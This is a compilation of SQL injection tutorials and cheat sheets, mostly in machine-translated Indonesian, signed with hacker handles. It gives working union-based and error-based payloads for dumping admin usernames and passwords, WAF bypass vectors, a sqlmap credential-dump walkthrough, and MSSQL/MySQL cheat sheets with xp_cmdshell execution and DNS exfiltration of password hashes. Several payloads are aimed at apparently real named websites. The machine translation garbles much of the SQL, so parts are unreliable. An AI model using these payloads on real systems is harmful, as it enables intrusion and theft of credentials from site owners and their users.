402Langkah Berikutnya adalah Kita Harus Mendapatkan Kolom.
403
404Ini adalah SYNTAX untuk Kolom.
405
406(pilih group_concat (3c42523e, table_name, 0x3a, column_name) dari information_schema.columns di mana table_schema = database ())
407
408Tambahkan SYNTAX ini di DIOS Query dan Execute it untuk Mendapatkan Kolom dari Setiap Tabel.
409
410Dan berikut adalah DIOS FINAL Pertanyaan untuk Tabel dan Kolom Berbasis Kesalahan dalam satu SHOT.
411
412http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat ('<BR>', table_name, 0x3a, column_name) dari information_schema.columns di mana table_schema = database ()))) x) a) - -
413©
414~ Ph.h4rh4r
415
416
417Error Based Injection -Tutorial (Ph.h4rh4r)
418Setelah Union Based Injection Dalam Tutorial ini Anda Akan Mempelajari Error Based SQL Injection.
419Bagaimana Anda Akan Memahami Bahwa WebSite Target kami dalam Injeksi Berbasis Kesalahan. ??
420Hmm Sementara kita adalah Situs Suntik, Dan Hitung Jumlah Total Kolom dan Kemudian Bangun Query SQL Berbasis Serikat.
421
422Kami mendapat 6 Jumlah Kolom. dan UNION BASED Query kami.
423
424http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6-- -
425
426Ketika kami Melaksanakan Query Berbasis Persatuan kami tidak memberikan kami Nomor Kolom yang Rentan yang Dicetak di Halaman Web atau dalam HTML.
427Ini Memberi Kita Pesan Kesalahan.
428
429Pernyataan SELECT yang digunakan memiliki jumlah kolom yang berbeda
430
431Kadang-kadang Situs TARGET tidak Memberikan Nomor Kolom yang Rentan dan Juga Tidak Ada Jenis Kesalahan. Situs-situs tersebut juga error SQL / Double Query SQL injection.
432Jadi Kami Diolah Selanjutnya Dengan Error Based Queries.
433
434Langkah pertama adalah Untuk Mendapatkan Versi.
435Berikut adalah Query Berdasarkan Kesalahan Untuk Dapatkan Versi.
436
437http://www.target.com/index.php?id=1 atau 1 grup oleh concat_ws (0x3a, versi (), lantai (rand (0) * 2)) memiliki min (0) atau 1-- -
438
439dan kami Akan Mendapatkan Versi Dicetak di WebPage.
440
441
442Langkah kedua adalah Untuk Mendapatkan Nama Database.
443
444Sekarang Mari Periksa Nama Database Saat Ini.
445Situs Web Dapat Memiliki Lebih dari 2, 3, atau 5 Basis Data. Jadi Kami Gunakan BATAS untuk mendapatkan semua Database.
446
447LIMIT 0,1 LIMIT 1,1 LIMIT 2,1 LIMIT 3,1
448
449Inilah Pertanyaan Kami Untuk Mendapatkan Basis Data.
450
451http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (database () sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
452
453
454Langkah ketiga adalah untuk mendapatkan tabel.
455Sekarang Kita Harus Mendapat Tabel. Seperti Kami Ingin Tabel Dari Database Primer.
456Berikut Ini Query Untuk Tabel Dari Database Primer.
457http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (table_name sebagai char), 0x7e)) dari information_schema. tabel di mana table_schema = database () limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
458
459Tingkatkan Nilai Batas sebagai LIMIT 0,1 hingga LIMIT 1,1 LIMIT 2,1 LIMIT 3,1
460Sampai Anda Mendapatkan Nama Tabel yang Diinginkan Anda.
461
462Langkah ke 4 adalah Mendapatkan Nama Kolom Dari Nama Tabel Bertarget Kami.
463Sekarang Kita Harus Mendapatkan Nama Kolom Dari Nama Tabel.
464Kami Mendapat Tabel Of Admin.
465Jadi Mari Dapatkan Kolom Dari Admin Tabel.
466
467Berikut Ini Query Untuk Mendapatkan Nama Kolom Dari Tabel Admin.
468
469http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (column_name sebagai char), 0x7e)) dari information_schema. kolom di mana table_name = 0xADMIN membatasi 0,1), lantai (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
470
471Untuk Mendapatkan Kolom Dari Tabel Admin kita Harus Mengkodekannya Di HEX dan Kemudian Kita Dapat Melaksanakan Permintaan Kita.
472Inilah BAGIAN dalam Pertanyaan Kita.
473
474Table_name = ADMIN
475Inilah Nilai HEX dari ADMIN = 61646d696e
476Dan Letakkan Dengan 0x untuk Membuat Kueri yang Benar.
477
478Table_name = 0x61646d696e
479
480Dan Inilah Kueri.
481http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (column_name sebagai char), 0x7e)) dari information_schema. kolom di mana table_name = 0x61646d696e limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
482
483Tingkatkan Nilai BATAS menjadi BATAS 0,1 LIMIT 1,1 LIMIT 2,1
484sampai kita Dapatkan Nama Kolom Seperti Nama Pengguna dan Kata Sandi.
485
4865Th Step Is to Extracting Data From Columns.
487Setelah Kami Dapatkan Nama Kolom Seperti Nama Pengguna Dan Kata Sandi.
488Langkah Berikutnya Adalah Mengeluarkan Data Dari Kolom Ini.
489
490Berikut ini adalah Query Untuk Mengekstrak Data dari Kolom.
491
492http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (concat (COLUMN_NAME_1,0x3a, COLUMN_NAME_2) sebagai char) , 0x3a)) dari batas TABLENAME 0,1), lantai (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
493
494KAMI Letakkan TABLENAME = Admin
495Dan
496Column_name_1 = nama pengguna
497Column_name_2 = kata sandi
498
499Jadi, inilah Query FINAL.
500
501http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (concat (nama pengguna, 0x3a, kata sandi) sebagai char) , 0x3a)) dari batas admin 0,1), lantai (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
502
503Dan Kami Dapatkan Nama Pengguna dan Kata Sandi ADMIN yang tercetak di Halaman.
504
505~ Ph.h4rh4r
506
507
508
509Amir Hossan Rahel
510http://www.realinstruments.ca/gallery.php?id=7 /*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7--+
511hello sir how I can bypass 'union select' please help me or post it your page thank you
512
513Real Instruments - Photo Gallery - 161 Maypoint Rd, Charlottetown, PEI
514realinstruments.ca
5151 · Suka · Tanggapi · Balas · Laporkan · 23 Jan
516SQLI Tutorial - Beginners
517http://www.realinstruments.ca/gallery.php?id=.7 unUNIONion seSELECTlect 11111111,2,3,4,5,6,7-- -
518
519Real Instruments - Photo Gallery - 161 Maypoint Rd, Charlottetown, PEI
520realinstruments.ca
521Suka · Tanggapi · Balas · Laporkan · 23 Jan
522SQLI Tutorial - Beginners
523SQLI Tutorial - Beginners
524No problem
525SQLI Tutor... membalas · Lihat semua 2 balasan
526
527
528
529Modsecurity WAF Bypass vectors
530
531--new version--
532id=@:=(-- a %0a select 123 from {f table})|0.1union-- a %0a select+1,@,3
533id=@:=(-- a %0a select 123 from {f table})*.9union/*!%0aselect 1,@,3*/
534id=@:=(%23 a %0a select 123 from {f table})-\Nunion%23 a %0a select+1,@,3
535id=@:=(%23 a %0a select 123 from ((table)))/1e0union%23 a %0a select+1,@,3
536id=@:=(%23 a %0a select 123 from ((table)))/1e0union%a0(select 1,@,3)
537
538--old version--
539id=1-.0union distinctrow select 1,2,3 from {f table}
540id=-1 /*!50000union*/ select 1,2,.3from table
541id=-1e0union distinct select 1,2,3e0from table
542id=\Nunion (select 1,2,\Nfrom table)
543id=.1union distinct select sql_cache 1,2,3 from table
544
545-h
546
547mysql injection concat() replacements
548
549select export_set(1,version(),user(),' : ',2);
5505.1.7 : my_user
551
552select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2);
5535.1.7 : my_user : my_db
554
555select make_set(7,version(),user(),schema());
5565.1.7,my_user,my_db
557
558select replace(make_set(7,version(),user(),schema()),',',' : ');
5595.1.7 : my_user : my_db
560
561select insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ');
5625.1.7 : my_user
563
564select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ')),length(schema())--1,0,' : ');
5655.1.7 : my_user : my_db
566
567select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user());
5685.1.7 : my_user
569
570select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema());
5715.1.7 : my_user : my_db
572
573select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version())
5745.1.7 : my_user
575
576select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version());
5775.1.7 : my_user : my_db
578
579select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user());
5805.1.7 : my_user
581
582select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema());
5835.1.7 : my_user : my_db
584
585group_concat() without comma-
586select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x);
5875.1.7 : my_user : my_db
588
589concat() waf bypass-
590/*!50000group_coNcat(*/)
591/*!50000coNcat(*/)
592`coNcat`%0a%0b%0c%0d%a0()
593{snoopdogg concat()}
594{s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}}
595{s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}}
596{s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}}
597concat-- a%0a()
598concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a)
599concat/**x**/()
600
601
602
603waf bypass with %75nion %73elect
604redirect = bypass with And 1<1 or add @ befor variable number like =@64' or =@'
605there redirect with dot in =.64' bypass by add @ like =@64' and 0 union select
606
607~h
608
609
610Multi-Query-Injection
611
612id=1-- -' our query-- -
613id=1%23' our query -- -
614id=1 union select null,null,null-- -' our query %23
615
616=1 ;%00 ' and 0 union select 1 ;%00!
617=1 -- - ' and 0 union select 1 -- -%
618=1 -- - ' or 1 union select 1,2 limit 2 -- -
619
620-----------------------------------------------------------
621Other Method
622
623=1' in boolean mode) UNION SELECT 1,2-- -
624=1' group by 1 union select 1,2-- -
625=1' procedure analyse() union select 1,2-- -
626=1) having 1=0 union select '11111' from dual -- - Where 0 %23
627=1 union select 1 LIMIT 0,1-- -
628'=0=column union select version() limit 1-- -
629
630~h
631
632
633Error based basic Tidak terlalu detail
634Cara pertama =====>
635+ DAN (SELECT COUNT (*) FROM (SELECT 1 UNION SELECT null UNION SELECT! 1) x GROUP oleh CONCAT ((versi SELECT () FROM information_schema.tables LIMIT 0,1), FLOOR (RAND (0) * 2)) )
636Cara kedua ====> packerss.in/review.php?id=260+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3) x + grup + oleh + concat (mid ((pilih + concat_ws (0x7e, versi (), 0x7e) + dari + information_schema.tables + limit + 0,1), 1,25), floor (rand (0) * 2))) a) -
637===>
638Database ===> packerss.in/review.php?id=260%20+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3) x + grup + oleh + concat (mid ((pilih + concat_ws (0x7e, group_concat (schema_name), 0x7e) + dari + information_schema.schemata% 20limit + 0,1), 1,25), floor (rand (0 ) * 2))) a) -
639==> Masukan 'informasi' duplikat
640skema, packer1 'untuk kunci' grup_
641kunci'
642tabel ===>
643packerss.in/review.php?id=260%20+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group + dengan + concat (mid ((pilih + concat_ws (0x7e, group_concat (table_name), 0x7e) + dari + information_schema.tables% 20where% 20table_schema = database ()% 20limit + 0,1), 1,25), lantai ( rand (0) * 2))) a) -
644===> Masukan duplikat 'tambah, admin, astro_
645ques, astr1 'untuk kunci' group_key '
646packerss.in/review.php?id=260+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2union+select+3)x+group+by + concat (mid ((pilih + concat_ws (0x7e, group_concat (table_name), 0x7e) + dari + information_schema.tables% 20where% 20table_schema = database ()% 20limit + 0,1), 58,25), lantai (rand ( 0) * 2))) a) -
647===> Entri duplikat
648'Laints, acara, mengundang, bergabung, 1' untuk kunci
649'group_key'
650+ dan + (pilih + 1 + dari + (pilih + count (*) + dari + (pilih + 1 + union + pilih + 2 + union + pilih + 3) x + grup + dengan + concat (mid ((pilih + concat_ws (0x7e, group_concat (column_name), 0x7e) + f rom + information_schema.columns di mana table_name = 0xHex_Table limit + 0,1), 1,25), floor (rand (0) * 2))) a) - x
651+ dan + (pilih + 1 + dari + (pilih + count (*) + dari + (pilih + 1 + union + pilih + 2 + union + pilih + 3) x + grup + dengan + concat (mid ((pilih + concat_ws (0x7e, group_concat (nama pengguna, 0x3a, passwo rd), 0x7e) + dari + pengguna limit + 0,1), 1,25), lantai (rand (0) * 2))) a) -
652
653-h
654
655
656
657Hi everyone,Today I'll show you a SQLI TIP,
658get large data with one request using substr function. use 'limit' is slow,
659so im gonna teach you how to bypass the error 1242,"'subquery
660returns more than 1 row'".
661I) Using substr function
662==
663the subtr function is usually for blind
664injection,but we can use this for bypass the limit
665of group_concat and the error 1242.
666for example,
667
668Code:
669
670http://www.lermitagehotel.ee/?
671pageid=160 +and+(select+1+from
672+(select+count(*),concat((select
673(select+concat(concat(user_na
674me,0x3a,user_pass),0x7e))+from
675+users+limit+0,1),floor(rand
676(0)*2))x+from+informat
677ion_schema.tables+group+by+x)a)
678error 1242-
679
680Subquery returns more than 1 row.
681we can use substr like that
682
683Code:
684
685And(select 1 from(select count
686(*),concat(0x3a,(select substr
687(group_concat(column1,0x3a,column2),1,150)from table where table_schema like database()),0x3a,floor(rand(0)*2))xfrom information_schema.tables group by x)z)-- -
688
689so
690Code:
691
692http://www.lermitagehotel.ee/?
693pageid=160 And(select 1 from
694(select count(*),concat(0x3a,
695(select substr(group_concat
696(table_name),1,150)from
697information_schema.tables where
698table_schema like database
699()),0x3a,floor(rand(0)*2))x from
700information_schema.tables group
701by x)z)-- -
702and
703
704Quote: Duplicate entry
705':admin_topmenu,album_photos,albums,
706defaults,form_items,form_log,' for key
707'group_key'
708Incre substr(group_concat(table_name),1,150) ...
709substr(group_concat(table_name),30,150)... to
710get next
711--
712
713in mysql>5
714Code:
715or 1 group by concat_ws(0x3a,
716(select substr(group_concat
717(column),1,150)
718from table),floor(rand(0)*2))
719having min(0) or 1-- -
720--
721in mysql 5.1+
722Code:
723and updatexml(0,concat(0x3a,
724(select substr(group_concat
725(column),1,150)
726from table)),0)-- -
727--
728notice: sometimes query number 2 dosent
729work,so use the first one.
730Code:
731II) Using concat() and group_concat
732()
733==
734Code:
735and updatexml(0,concat(0x3a,
736(select concat(0x3a,group_concat
737(column))
738from table)),0)-- -
739only for extractvalue() / updatexml().
740
741enjoy
742
743~h
744
745
746HACK WEBSITE MENGGUNAKAN SQLMAP SQL INJECTION TOOLS FULL TUTORIAL
747
748bagaimana cara menggunakan sqlmap pada metode GET
749
750
751- fingerprinting
752
753pertama Anda harus memiliki situs web yang rentan untuk target, jika Anda memiliki target sekarang buka sqlmap dan ketik perintah ini
754./sqlmap.py -u "http://www.target.com/index.php?id=2"
755sqlmap akan mendeteksi rentan dari target Anda dan akan memberi tahu Anda apa jenis rentan dan apa tipe database. dan jika target Anda rentan, lanjutkan ke langkah berikutnya.
756
757
758- temukan nama database
759
760ketik perintah ini untuk mencari nama database
761./sqlmap.py -u "http://www.target.com/index.php?id=2" --dbs
762pada langkah ini, sqlmap akan menemukan nama database target Anda, misalnya saya menggunakan "web_db" untuk nama database.
763
764
765- temukan nama tabel
766
767Setelah sqlmap menemukan nama databse waktunya untuk menemukan nama tabel. gunakan perintah ini untuk menemukan nama tabel
768./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db --table
769di sana akan menunjukkan kepada Anda beberapa nama tabel di dalam database "web_db", ok misalnya saya menggunakan "tbl_admin" sebagai nama tabel.
770
771
772- temukan nama kolom
773
774waktunya untuk menemukan apa yang ada di dalam "tbl_admin" dari "web_db" dan kami menyebutnya kolom. untuk menemukan kolom ketik perintah ini
775./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin --columns
776ini akan menunjukkan daftar nama kolom, misalnya saya menemukan kolom "pengguna" dan "kata sandi".
777
778
779- buang
780
781perintah ini akan membuang data dari kolom, ketik perintah ini
782./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin -C pengguna, kata sandi --dump
783dan saya menemukan "user = admin" dan "password = adminpass". sekarang buka web dan temukan admin login.
784
785bagaimana cara menggunakan sqlmap pada metode POST
786
787
788caranya sama dengan metode GET, hanya saja Anda harus memasukkan data POST ke sqlmap. misalnya saya memiliki situs yang rentan pada jalur "login.php". data POST adalah "id = admin & pwd = kata sandi & kirim = login". bagaimana cara menemukan data POST? cukup gunakan "Live HTTPheaders" yang merupakan add ons firefox.
789
790
791- fingerprinting
792
793caranya yang sama dengan metode GET, ketikkan saja perintah ini
794./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = login"
795
796- temukan nama database
797
798./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" --dbs
799
800- temukan nama tabel
801
802./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" -D web_db --table
803
804- temukan nama kolom
805
806./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" -D web_db -T tbl_admin - kolom
807
808- buang
809
810./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = login" -D web_db -T tbl_admin -C pengguna, kata sandi --dump
811
812
813termasuk cookie
814
815
816masih metode yang sama tetapi Anda hanya harus memasukkan cookie
817./sqlmap.py -u "http://www.target.com/index.php?id=2" --cookie = "PHPSESSID = 123asdqwe456blabla; user = admin"
818atau
819./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" --cookie = "PHPSESSID = 123asdqwe456blabla; user = admin"
820
821parameter khusus
822
823
824jika Anda memiliki parameter khusus untuk menyuntikkan Anda dapat mengetik "-p" seperti perintah ini
825./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" --cookie = "PHPSESSID = 123asdqwe456blabla; user = admin" -p "pwd"
826sqlmap akan menyuntikkan parameter "pwd". atau Anda dapat memberi bintang "*" ke parameter untuk disuntikkan, seperti ini
827./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = * kata sandi & kirim = masuk" --cookie = "PHPSESSID = 123asdqwe456blabla; user = admin"
828
829penutup
830
831
832jika Anda pengguna windows, jangan gunakan "./" untuk menjalankannya pada cmd.
833
834Go To Download Software: http://sqlmap.org/
835
836when you try to access server with your SQL WAF will stop you again. You might have more luck if WAF controls only GET requests and you inject with POST...
837
838SQLi Waf Behaviours
839
840union select 1,2,3,4-- - [<---WAF
841
842/*!union*/ select 1,2,3,4-- - [<--- No WAF
843
844/*!union*/ select 1,group_concat(),3,4-- - [<--NO -WAF
845
846/*!union*/ select 1,group_concat(table_name),3,4-- - [<---WAF
847
848/*!union*/ select 1,group_concat(/*!table_name*/),3,4-- - [<--- No WAF
849
850/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from -- - [<---No WAF
851
852/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables-- - [<---No WAF
853
854/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables where-- - [<---WAF
855
856/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/-- - [<---No WAF
857
858/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema-- - [<---No WAF
859
860/*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema=database()-- - [<---No WAF
861
862~asero
863
864EXTRACTING USERNAME AND PASSWORD IN THE TABLE
865
866QUERY :
867
868(select (@x) from (select (@x:=0x00), (select (@x) from users where (@x) in (@x:=concat(@x,'<br>',username,' : ',password))))x)
869
870Here are the three methods which i know and mostly use to bypass [,] COMMA
8711) union select 1/*!,*/ 2/*!,*/3
8722) union select 1,CHAR(44), 2,CHAR(44),3,char(44)
8733)(select 1)a join (select 2)b join (select 3)c
874hOpe if you have concept of sql injection i don't think i have to give eXample
875But also leaving here one eXample
876www.vuln.com/events.php?id=-1 union select 1,2,3===>blockEd..
877now use
878Union select 1,CHAR(44), 2,CHAR(44),3,char(44)--
879~h
880
881Pengetahuan Sql Untuk pelajar :)
882-------------------------------------------------- ------
883---> Apa itu Sql Injection
884-------------------------------------------------- -------
885Injeksi SQL adalah teknik di mana pengguna jahat dapat menyuntikkan perintah SQL ke dalam pernyataan SQL, melalui input halaman web.
886Perintah SQL yang disuntikkan dapat mengubah pernyataan SQL dan membahayakan keamanan aplikasi web. Dan Juga Hancurkan basis data colonthree Anda
887-------------------------------------------------- -------
888---> Apa itu Information_schema?
889-------------------------------------------------- -------
890INFORMATION_SCHEMA adalah basis data informasi, tempat yang menyimpan informasi tentang semua basis data lain yang disimpan oleh server MySQL. Di dalam INFORMATION_SCHEMA ada beberapa tabel hanya-baca.
891Berikut ini adalah daftar masing-masing pandangan yang ada.
892INFORMATION_SCHEMA.CHECK_CONSTRAINTS
893INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE
894INFORMATION_SCHEMA.COLUMN_PRIVILEGES
895INFORMATION_SCHEMA.COLUMNS
896INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE
897INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE
898INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS
899INFORMATION_SCHEMA.DOMAINS
900INFORMATION_SCHEMA.KEY_COLUMN_USAGE
901INFORMATION_SCHEMA.PARAMETERS
902INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS
903INFORMATION_SCHEMA.ROUTINE_COLUMNS
904INFORMATION_SCHEMA.ROUTINES
905INFORMATION_SCHEMA.SCHEMATA
906INFORMATION_SCHEMA.TABLE_CONSTRAINTS
907INFORMATION_SCHEMA.TABLE_PRIVILEGES
908INFORMATION_SCHEMA.TABLES
909INFORMATION_SCHEMA.VIEW_COLUMN_USAGE
910INFORMATION_SCHEMA.VIEW_TABLE_USAGE
911INFORMATION_SCHEMA.VIEWS
912-------------------------------------------------- -----
913---> Apa Nilai Null?
914-------------------------------------------------- -------
915NULL SQL adalah istilah yang digunakan untuk merepresentasikan nilai yang hilang. Nilai NULL dalam tabel adalah nilai dalam bidang yang tampaknya kosong.
916Bidang dengan nilai NULL adalah bidang tanpa nilai. Sangat penting untuk memahami bahwa nilai NULL berbeda dari nilai nol atau bidang yang berisi spasi.
917---------------------------
918
919
920MSSQL INJECTION CHEAT SHEET
921
922Version SELECT @@version
923Comments SELECT 1 — comment
924SELECT /*comment*/1
925Current User SELECT user_name();
926SELECT system_user;
927SELECT user;
928SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
929List Users SELECT name FROM master..syslogins
930List Password Hashes SELECT name, password FROM master..sysxlogins — priv, mssql 2000;
931SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
932SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;
933SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005
934Password Cracker MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack these.
935List Privileges – current privs on a particular object in 2005, 2008
936SELECT permission_name FROM master..fn_my_permissions(null, ‘DATABASE’); — current database
937SELECT permission_name FROM master..fn_my_permissions(null, ‘SERVER’); — current server
938SELECT permission_name FROM master..fn_my_permissions(‘master..syslogins’, ‘OBJECT’); –permissions on a table
939SELECT permission_name FROM master..fn_my_permissions(‘sa’, ‘USER’);
940–permissions on a user– current privs in 2005, 2008
941SELECT is_srvrolemember(‘sysadmin’);
942SELECT is_srvrolemember(‘dbcreator’);
943SELECT is_srvrolemember(‘bulkadmin’);
944SELECT is_srvrolemember(‘diskadmin’);
945SELECT is_srvrolemember(‘processadmin’);
946SELECT is_srvrolemember(‘serveradmin’);
947SELECT is_srvrolemember(‘setupadmin’);
948SELECT is_srvrolemember(‘securityadmin’);
949– who has a particular priv? 2005, 2008
950SELECT name FROM master..syslogins WHERE denylogin = 0;
951SELECT name FROM master..syslogins WHERE hasaccess = 1;
952SELECT name FROM master..syslogins WHERE isntname = 0;
953SELECT name FROM master..syslogins WHERE isntgroup = 0;
954SELECT name FROM master..syslogins WHERE sysadmin = 1;
955SELECT name FROM master..syslogins WHERE securityadmin = 1;
956SELECT name FROM master..syslogins WHERE serveradmin = 1;
957SELECT name FROM master..syslogins WHERE setupadmin = 1;
958SELECT name FROM master..syslogins WHERE processadmin = 1;
959SELECT name FROM master..syslogins WHERE diskadmin = 1;
960SELECT name FROM master..syslogins WHERE dbcreator = 1;
961SELECT name FROM master..syslogins WHERE bulkadmin = 1;
962List DBA Accounts SELECT is_srvrolemember(‘sysadmin’); — is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try ‘bulkadmin’, ‘systemadmin’ and other values from the documentation
963SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
964SELECT name FROM master..syslogins WHERE sysadmin = ’1′ — tested on 2005
965Current Database SELECT DB_NAME()
966List Databases SELECT name FROM master..sysdatabases;
967SELECT DB_NAME(N); — for N = 0, 1, 2, …
968List Columns SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
969SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
970List Tables SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
971SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
972SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
973Find Tables From Column Name – NB: This example works only for the current database. If you wan’t to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
974SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’
975Select Nth Row SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row
976Select Nth Char SELECT substring(‘abcd’, 3, 1) — returns c
977Bitwise AND SELECT 6 & 2 — returns 2
978SELECT 6 & 1 — returns 0
979ASCII Value -> Char SELECT char(0×41) — returns A
980Char -> ASCII Value SELECT ascii(‘A’) – returns 65
981Casting SELECT CAST(’1′ as int);
982SELECT CAST(1 as char)
983String Concatenation SELECT ‘A’ + ‘B’ – returns AB
984If Statement IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1
985Case Statement SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1
986Avoiding Quotes SELECT char(65)+char(66) — returns AB
987Time Delay WAITFOR DELAY ’0:0:5′ — pause for 5 seconds
988Make DNS Requests declare @host varchar(800); select @host = name FROM master..syslogins; exec(‘master..xp_getfiledetails â€\’ + @host + ‘c$boot.iniâ€â€™); — nonpriv, works on 2000declare @host varchar(800); select @host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) + ‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist â€\’ + @host + ‘c$boot.iniâ€â€™); — priv, works on 2005– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
989– Also check out theDNS tunnel feature of sqlninja
990Command Execution EXEC xp_cmdshell ‘net user’; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:
991EXEC sp_configure ‘show advanced options’, 1; — priv
992RECONFIGURE; — priv
993EXEC sp_configure ‘xp_cmdshell’, 1; — priv
994RECONFIGURE; — priv
995Local File Access CREATE TABLE mydata (line varchar(8000));
996BULK INSERT mydata FROM ‘c:boot.ini’;
997DROP TABLE mydata;
998Hostname, IP Address SELECT HOST_NAME()
999Create Users EXEC sp_addlogin ‘user’, ‘pass’; — priv
1000Drop Users EXEC sp_droplogin ‘user’; — priv
1001Make User DBA EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin; — priv
1002Location of DB files EXEC sp_helpdb master; –location of master.mdf
1003EXEC sp_helpdb pubs; –location of pubs.mdf
1004Default/System Databases northwind
1005model
1006msdb
1007pubs — not on sql server 2005
1008tempdb
1009
1010------------------------------------
1011
1012MYSQL INJECTION CHEAT SHEET
1013
1014Version SELECT @@version
1015Comments SELECT 1; #comment
1016SELECT /*comment*/1;
1017Current User SELECT user();
1018SELECT system_user();
1019List Users SELECT user FROM mysql.user; — priv
1020List Password Hashes SELECT host, user, password FROM mysql.user; — priv
1021Password Cracker John the Ripper will crack MySQL password hashes.
